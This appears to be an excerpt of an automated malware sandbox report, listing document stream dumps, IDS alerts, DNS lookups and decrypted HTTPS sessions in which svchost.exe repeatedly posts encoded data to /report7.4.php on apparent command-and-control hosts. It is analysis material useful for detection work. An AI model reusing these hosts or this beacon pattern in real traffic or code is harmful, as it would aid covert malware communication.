                                                                                  Stream Path:\x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472
                                                                                  File Type:data
                                                                                  Stream Size:84
                                                                                  Entropy:3.94190859404
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . j . r . . . . . \\ . . . $ . 8 .
                                                                                  Data Raw:83 02 85 02 87 02 88 02 89 02 8b 02 8d 02 8e 02 8f 02 90 02 91 02 92 02 93 02 94 02 84 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ee 82 20 83 e8 83 78 85 dc 85 c8 99 6a 98 72 86 94 91 f8 91 5c 92 c0 92 24 93 38 98
                                                                                  Stream Path: \x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486, File Type: data, Stream Size: 4
                                                                                  General
                                                                                  Stream Path:\x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486
                                                                                  File Type:data
                                                                                  Stream Size:4
                                                                                  Entropy:1.5
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . .
                                                                                  Data Raw:b2 02 b4 02
                                                                                  Stream Path: \x18496\x16911\x17892\x17784\x18472, File Type: data, Stream Size: 16
                                                                                  General
                                                                                  Stream Path:\x18496\x16911\x17892\x17784\x18472
                                                                                  File Type:data
                                                                                  Stream Size:16
                                                                                  Entropy:2.17742128383
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . . . . . .
                                                                                  Data Raw:b2 02 00 00 00 00 00 00 02 80 01 80 b3 02 00 80
                                                                                  Stream Path: \x18496\x16918\x17191\x18468, File Type: MIPSEB Ucode, Stream Size: 12
                                                                                  General
                                                                                  Stream Path:\x18496\x16918\x17191\x18468
                                                                                  File Type:MIPSEB Ucode
                                                                                  Stream Size:12
                                                                                  Entropy:1.25162916739
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . .
                                                                                  Data Raw:01 80 01 80 00 00 00 00 00 00 00 00
                                                                                  Stream Path: \x18496\x17163\x16689\x18229, File Type: data, Stream Size: 4
                                                                                  General
                                                                                  Stream Path:\x18496\x17163\x16689\x18229
                                                                                  File Type:data
                                                                                  Stream Size:4
                                                                                  Entropy:2.0
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . .
                                                                                  Data Raw:ea 02 01 00
                                                                                  Stream Path: \x18496\x17165\x16949\x17894\x17778\x18492, File Type: data, Stream Size: 18
                                                                                  General
                                                                                  Stream Path:\x18496\x17165\x16949\x17894\x17778\x18492
                                                                                  File Type:data
                                                                                  Stream Size:18
                                                                                  Entropy:2.46132014021
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . .
                                                                                  Data Raw:b3 02 b8 02 ba 02 00 00 b3 02 b3 02 b7 02 b9 02 bb 02
                                                                                  Stream Path: \x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 384
                                                                                  General
                                                                                  Stream Path:\x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934
                                                                                  File Type:data
                                                                                  Stream Size:384
                                                                                  Entropy:4.95816205211
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:= . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                  Data Raw:3d 00 6e 00 84 00 83 02 85 02 86 02 87 02 88 02 89 02 8a 02 8b 02 8d 02 8e 02 8f 02 90 02 91 02 92 02 93 02 94 02 96 02 be 02 bf 02 c0 02 c1 02 c2 02 c4 02 c5 02 c6 02 c7 02 c8 02 c9 02 cb 02 cc 02 cd 02 ce 02 cf 02 d0 02 d1 02 d2 02 d3 02 d4 02 d5 02 d6 02 d7 02 d8 02 d9 02 da 02 db 02 dc 02 dd 02 de 02 df 02 e0 02 e1 02 e2 02 e3 02 e4 02 e5 02 e6 02 e7 02 e8 02 e9 02 ec 02 ed 02
                                                                                  Stream Path: \x18496\x17548\x17648\x17522\x17512\x18487, File Type: data, Stream Size: 12
                                                                                  General
                                                                                  Stream Path:\x18496\x17548\x17648\x17522\x17512\x18487
                                                                                  File Type:data
                                                                                  Stream Size:12
                                                                                  Entropy:2.52205520887
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . .
                                                                                  Data Raw:b4 02 b5 02 b3 02 00 80 b6 02 00 00
                                                                                  Stream Path: \x18496\x17558\x17959\x16943\x17180\x17514\x17892\x17784\x18472, File Type: data, Stream Size: 6
                                                                                  General
                                                                                  Stream Path:\x18496\x17558\x17959\x16943\x17180\x17514\x17892\x17784\x18472
                                                                                  File Type:data
                                                                                  Stream Size:6
                                                                                  Entropy:2.25162916739
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . .
                                                                                  Data Raw:ee 02 09 84 ef 02
                                                                                  Stream Path: \x18496\x17753\x17650\x17768\x18231, File Type: data, Stream Size: 60
                                                                                  General
                                                                                  Stream Path:\x18496\x17753\x17650\x17768\x18231
                                                                                  File Type:data
                                                                                  Stream Size:60
                                                                                  Entropy:3.38677863114
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                  Data Raw:77 02 98 02 9a 02 9c 02 9e 02 a0 02 a1 02 a3 02 a5 02 a7 02 a9 02 ab 02 ad 02 af 02 b1 02 97 02 99 02 9b 02 9d 02 9f 02 9f 02 a2 02 a4 02 a6 02 a8 02 aa 02 ac 02 ae 02 b0 02 a4 02
                                                                                  Stream Path: \x18496\x17932\x17910\x17458\x16778\x17207\x17522, File Type: data, Stream Size: 16
                                                                                  General
                                                                                  Stream Path:\x18496\x17932\x17910\x17458\x16778\x17207\x17522
                                                                                  File Type:data
                                                                                  Stream Size:16
                                                                                  Entropy:2.90563906223
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . 3 . . . . . . . . . . .
                                                                                  Data Raw:83 02 96 02 33 81 02 8c b3 02 ea 02 bc 02 00 00

                                                                                  Network Behavior

                                                                                  Snort IDS Alerts

                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                  10/24/21-12:49:34.014326UDP1948DNS zone transfer UDP6078553192.168.2.334.64.183.91
                                                                                  10/24/21-12:49:42.697753UDP1948DNS zone transfer UDP6078553192.168.2.334.64.183.91
                                                                                  10/24/21-12:49:47.628452UDP1948DNS zone transfer UDP6078553192.168.2.334.64.183.91
                                                                                  10/24/21-12:49:58.425112UDP1948DNS zone transfer UDP6078553192.168.2.334.64.183.91
                                                                                  10/24/21-12:50:06.100895ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.334.64.183.91
                                                                                  10/24/21-12:50:06.820513ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.334.64.183.91
                                                                                  10/24/21-12:50:07.902093ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.334.64.183.91
                                                                                  10/24/21-12:50:09.460402ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.334.64.183.91
                                                                                  10/24/21-12:50:10.421239ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.334.64.183.91
                                                                                  10/24/21-12:51:41.901821UDP1948DNS zone transfer UDP5394753192.168.2.334.64.183.91

                                                                                  Network Port Distribution

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Oct 24, 2021 12:49:25.744143963 CEST6402153192.168.2.38.8.8.8
                                                                                  Oct 24, 2021 12:49:25.744909048 CEST6078453192.168.2.38.8.8.8
                                                                                  Oct 24, 2021 12:49:25.765116930 CEST53640218.8.8.8192.168.2.3
                                                                                  Oct 24, 2021 12:49:25.769309044 CEST53607848.8.8.8192.168.2.3

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                  Oct 24, 2021 12:49:25.744143963 CEST192.168.2.38.8.8.80x5e85Standard query (0)toa.mygametoa.comA (IP address)IN (0x0001)
                                                                                  Oct 24, 2021 12:49:25.744909048 CEST192.168.2.38.8.8.80xdd65Standard query (0)toa.mygametoa.com28IN (0x0001)

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                  Oct 24, 2021 12:49:25.765116930 CEST8.8.8.8192.168.2.30x5e85No error (0)toa.mygametoa.com34.64.183.91A (IP address)IN (0x0001)

                                                                                  HTTP Request Dependency Graph

                                                                                  • bh.mygameadmin.com
                                                                                  • fg.mygameagend.com

                                                                                  HTTPS Proxied Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  0192.168.2.349805104.21.75.46443C:\Windows\System32\svchost.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  2021-10-24 10:50:06 UTC0OUTPOST /report7.4.php HTTP/1.1
                                                                                  Accept: */*
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
                                                                                  Host: bh.mygameadmin.com
                                                                                  Content-Length: 278
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2021-10-24 10:50:06 UTC0OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 63 33 4e 79 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 6b 61 61 47 6c 6d 56 74 61 58 75 57 70 74 36 6b 70 70 6d 31 74 62 57 31 70 71 43 6b 70 6d 6c 6f 5a 32 68 37 70 74 36 6b 31 35 4f 67 70 4b 5a 76 6c 4b 62 65 70 4b 62 58 31 4e 61 69 31 39 62 66 6f 74 65 6f 71 61 4b 70 71 61 61 67 70 4b 5a 6a 5a 33 6c 73 62 32 4a 37 62 33 69 6d 33 71 53 6d 71 34 66 66 33 4a 6d 74 6d 71 69 71 31 71 75 71 31 39 61 48 71 4e 79 71 68 39 61 47 31 4b 75 70 6d 39 24 66 6d 71 32 47 68 70 69 6d 6f 4b 53 6d 59 32 70 37 6c 71 62 65 70 4b 62 63 6f 74 40 6d 6f 4b 53 6d 6c 6e 74 39 62 32 56 69 70 74 36 6b 70 72 36 64 70 71 43 6b 70 6d 69 66 6c
                                                                                  Data Ascii: p=kaZ5bGdiYntgb3im3qTc3NygpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6kkaaGlmVtaXuWpt6kppm1tbW1pqCkpmloZ2h7pt6k15OgpKZvlKbepKbX1Nai19bfoteoqaKpqaagpKZjZ3lsb2J7b3im3qSmq4ff3Jmtmqiq1quq19aHqNyqh9aG1Kupm9$fmq2GhpimoKSmY2p7lqbepKbcot@moKSmlnt9b2Vipt6kpr6dpqCkpmifl
                                                                                  2021-10-24 10:50:06 UTC0INHTTP/1.1 200 OK
                                                                                  Date: Sun, 24 Oct 2021 10:50:06 GMT
                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jdf50sAmKZd6hLj9ndhfpyKIog6ideF2zxWcBaYKj894GXG0PFqHMV8vHTZYdmXG7Y%2FQZs0GQPAaX2O89bWX2YaOvd8H1CAkVAsqSmhb2pw28sUNeAGhJVPDz95OyfMf1YXMv2Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 6a32a46d09d06958-FRA
                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                  2021-10-24 10:50:06 UTC1INData Raw: 33 62 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 7d 7d 0d 0a
                                                                                  Data Ascii: 3b{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1}}
                                                                                  2021-10-24 10:50:06 UTC1INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  1192.168.2.349807172.67.167.122443C:\Windows\System32\svchost.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  2021-10-24 10:50:06 UTC1OUTPOST /report7.4.php HTTP/1.1
                                                                                  Accept: */*
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
                                                                                  Host: fg.mygameagend.com
                                                                                  Content-Length: 278
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2021-10-24 10:50:06 UTC1OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 63 33 4e 79 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 6b 61 61 47 6c 6d 56 74 61 58 75 57 70 74 36 6b 70 70 6d 31 74 62 57 31 70 71 43 6b 70 6d 6c 6f 5a 32 68 37 70 74 36 6b 31 35 4f 67 70 4b 5a 76 6c 4b 62 65 70 4b 62 58 31 4e 61 69 31 39 62 66 6f 74 65 6f 71 61 4b 70 71 61 61 67 70 4b 5a 6a 5a 33 6c 73 62 32 4a 37 62 33 69 6d 33 71 53 6d 71 34 66 66 33 4a 6d 74 6d 71 69 71 31 71 75 71 31 39 61 48 71 4e 79 71 68 39 61 47 31 4b 75 70 6d 39 24 66 6d 71 32 47 68 70 69 6d 6f 4b 53 6d 59 32 70 37 6c 71 62 65 70 4b 62 63 6f 74 40 6d 6f 4b 53 6d 6c 6e 74 39 62 32 56 69 70 74 36 6b 70 72 36 64 70 71 43 6b 70 6d 69 66 6c
                                                                                  Data Ascii: p=kaZ5bGdiYntgb3im3qTc3NygpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6kkaaGlmVtaXuWpt6kppm1tbW1pqCkpmloZ2h7pt6k15OgpKZvlKbepKbX1Nai19bfoteoqaKpqaagpKZjZ3lsb2J7b3im3qSmq4ff3Jmtmqiq1quq19aHqNyqh9aG1Kupm9$fmq2GhpimoKSmY2p7lqbepKbcot@moKSmlnt9b2Vipt6kpr6dpqCkpmifl
                                                                                  2021-10-24 10:50:07 UTC1INHTTP/1.1 200 OK
                                                                                  Date: Sun, 24 Oct 2021 10:50:07 GMT
                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z6hUjLumL9CnwY4P8w5uIjqoOwpKUS1DgjCVcTv6q4LTeqn2T%2FhuwPLK4yZM81PbWzttV8PlbDYtQQKcoxFizdU5vAxrou1x8DtbL%2FCs8csw%2Fxw9kqeJG6mZZwkJqHkGLQ0Oh3s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 6a32a47199059aaa-FRA
                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                  2021-10-24 10:50:07 UTC2INData Raw: 33 62 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 7d 7d 0d 0a
                                                                                  Data Ascii: 3b{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1}}
                                                                                  2021-10-24 10:50:07 UTC2INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  2192.168.2.349808104.21.75.46443C:\Windows\System32\svchost.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  2021-10-24 10:50:07 UTC2OUTPOST /report7.4.php HTTP/1.1
                                                                                  Accept: */*
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
                                                                                  Host: bh.mygameadmin.com
                                                                                  Content-Length: 278
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2021-10-24 10:50:07 UTC3OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 63 33 4e 79 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 6b 61 61 47 6c 6d 56 74 61 58 75 57 70 74 36 6b 70 70 6d 31 74 62 57 31 70 71 43 6b 70 6d 6c 6f 5a 32 68 37 70 74 36 6b 31 35 4f 67 70 4b 5a 76 6c 4b 62 65 70 4b 62 58 31 4e 61 69 31 39 62 66 6f 74 65 6f 71 61 4b 70 71 61 61 67 70 4b 5a 6a 5a 33 6c 73 62 32 4a 37 62 33 69 6d 33 71 53 6d 71 34 66 66 33 4a 6d 74 6d 71 69 71 31 71 75 71 31 39 61 48 71 4e 79 71 68 39 61 47 31 4b 75 70 6d 39 24 66 6d 71 32 47 68 70 69 6d 6f 4b 53 6d 59 32 70 37 6c 71 62 65 70 4b 62 63 6f 74 40 6d 6f 4b 53 6d 6c 6e 74 39 62 32 56 69 70 74 36 6b 70 72 36 64 70 71 43 6b 70 6d 69 66 6c
                                                                                  Data Ascii: p=kaZ5bGdiYntgb3im3qTc3NygpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6kkaaGlmVtaXuWpt6kppm1tbW1pqCkpmloZ2h7pt6k15OgpKZvlKbepKbX1Nai19bfoteoqaKpqaagpKZjZ3lsb2J7b3im3qSmq4ff3Jmtmqiq1quq19aHqNyqh9aG1Kupm9$fmq2GhpimoKSmY2p7lqbepKbcot@moKSmlnt9b2Vipt6kpr6dpqCkpmifl
                                                                                  2021-10-24 10:50:08 UTC3INHTTP/1.1 200 OK
                                                                                  Date: Sun, 24 Oct 2021 10:50:08 GMT
                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uLAFwLXyGPPDeDuTzEAYGTNoP%2BrU2Rqu9VpwcvV%2FJnmPEaI4h5e9piw6UviyVP4NEDEBDeNTDtm0K1P%2FY9sCQY1xYRS6zGI8WpUJuoWo6e6pvRs%2BTJrrA1SSwHLkJkBjCRfy5xY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 6a32a4752cfb074a-FRA
                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                  2021-10-24 10:50:08 UTC4INData Raw: 33 62 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 7d 7d 0d 0a
                                                                                  Data Ascii: 3b{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1}}
                                                                                  2021-10-24 10:50:08 UTC4INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  3192.168.2.349811104.21.75.46443C:\Windows\System32\svchost.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  2021-10-24 10:50:09 UTC4OUTPOST /report7.4.php HTTP/1.1
                                                                                  Accept: */*
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
                                                                                  Host: bh.mygameadmin.com
                                                                                  Content-Length: 558
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2021-10-24 10:50:09 UTC4OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 63 33 4e 79 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 73 5a 47 6d 68 70 5a 6c 62 57 6c 37 6c 71 62 65 70 4b 61 5a 62 4a 5a 6c 59 33 75 6d 6f 4b 53 6d 6d 57 56 6c 59 57 39 37 61 61 62 65 70 4b 61 43 6a 35 6a 54 31 74 53 6f 30 37 35 6d 6e 39 65 55 5a 36 69 43 6c 33 6d 38 69 6d 6d 50 6e 5a 75 31 71 62 35 6a 5a 34 36 66 5a 71 70 74 65 4e 53 66 61 4a 6c 37 61 4c 79 48 6e 59 65 24 6e 35 6d 63 6c 32 6e 57 5a 59 61 74 6e 57 4b 50 71 5a 52 39 6e 32 79 59 6c 34 6d 41 6c 47 43 62 69 32 5a 34 71 34 46 6f 6d 47 4f 61 61 32 6a 66 74 62 36 4c 6d 61 68 37 71 70 65 4c 69 5a 65 46 6a 70 69 70 61 4e 65 38 31 37 65 65 76 71 71 62 6d
                                                                                  Data Ascii: p=kaZ5bGdiYntgb3im3qTc3NygpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6ksZGmhpZlbWl7lqbepKaZbJZlY3umoKSmmWVlYW97aabepKaCj5jT1tSo075mn9eUZ6iCl3m8immPnZu1qb5jZ46fZqpteNSfaJl7aLyHnYe$n5mcl2nWZYatnWKPqZR9n2yYl4mAlGCbi2Z4q4FomGOaa2jftb6Lmah7qpeLiZeFjpipaNe817eevqqbm
                                                                                  2021-10-24 10:50:09 UTC5INHTTP/1.1 200 OK
                                                                                  Date: Sun, 24 Oct 2021 10:50:09 GMT
                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EVQwNj3Kap4FKLvdJMaAtg9Mz9%2FrrG69k9B9uH4wfGH0wqgI%2BrFnZqFfS%2BpV1OEcCq3eMbq5FgqJqwhhZsDyPjerzbvG3%2FTIEcnfCSOxOWrLN5fk37Y%2BMT2OV5FHz0phpySXAbA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 6a32a47f3c4d1756-FRA
                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                  2021-10-24 10:50:09 UTC5INData Raw: 33 33 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 5b 5d 7d 0d 0a
                                                                                  Data Ascii: 33{"host":[],"spacing":1800,"spacing2":120,"data":[]}
                                                                                  2021-10-24 10:50:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  4192.168.2.349812104.21.75.46443C:\Windows\System32\svchost.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  2021-10-24 10:50:09 UTC5OUTPOST /report7.4.php HTTP/1.1
                                                                                  Accept: */*
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
                                                                                  Host: bh.mygameadmin.com
                                                                                  Content-Length: 254
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2021-10-24 10:50:09 UTC6OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 63 33 4e 79 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 6b 61 5a 70 61 47 64 6f 65 36 62 65 70 4b 75 54 6f 4b 53 6d 62 35 53 6d 33 71 53 6d 31 39 54 57 6f 74 66 57 33 36 4c 58 71 4b 6d 69 71 61 6d 6d 6f 4b 53 6d 59 32 64 35 62 47 39 69 65 32 39 34 70 74 36 6b 70 71 75 48 33 39 79 5a 72 5a 71 6f 71 74 61 72 71 74 66 57 68 36 6a 63 71 6f 66 57 68 74 53 72 71 5a 76 66 33 35 71 74 68 6f 61 59 70 71 43 6b 70 6d 4e 71 65 35 61 6d 33 71 53 6d 33 4b 4c 66 70 71 43 6b 70 70 5a 37 66 57 39 6c 59 71 62 65 70 4b 61 40 6e 61 61 67 70 4b 5a 6f 6e 35 52 37 70 74 36 6b 71 36 43 6b 70 6d 70 37 6c 71 62 65 70 4b 6e 57 6b 77 3d 3d
                                                                                  Data Ascii: p=kaZ5bGdiYntgb3im3qTc3NygpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6kkaZpaGdoe6bepKuToKSmb5Sm3qSm19TWotfW36LXqKmiqammoKSmY2d5bG9ie294pt6kpquH39yZrZqoqtarqtfWh6jcqofWhtSrqZvf35qthoaYpqCkpmNqe5am3qSm3KLfpqCkppZ7fW9lYqbepKa@naagpKZon5R7pt6kq6Ckpmp7lqbepKnWkw==
                                                                                  2021-10-24 10:50:10 UTC6INHTTP/1.1 200 OK
                                                                                  Date: Sun, 24 Oct 2021 10:50:10 GMT
                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=68TwEML4Cj7sr1PqJIQznNgRxV0YJLB%2FVClWpmfGY%2BZBID3jAMRjNo3X0iHULIZ1iakt4GBHxNqyGwnuU5LL9UfYzuDL2HtEJtOhLokMJjLeK4PIwNbJdMzMUjcJOG05sseGpDs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 6a32a48489c84a85-FRA
                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
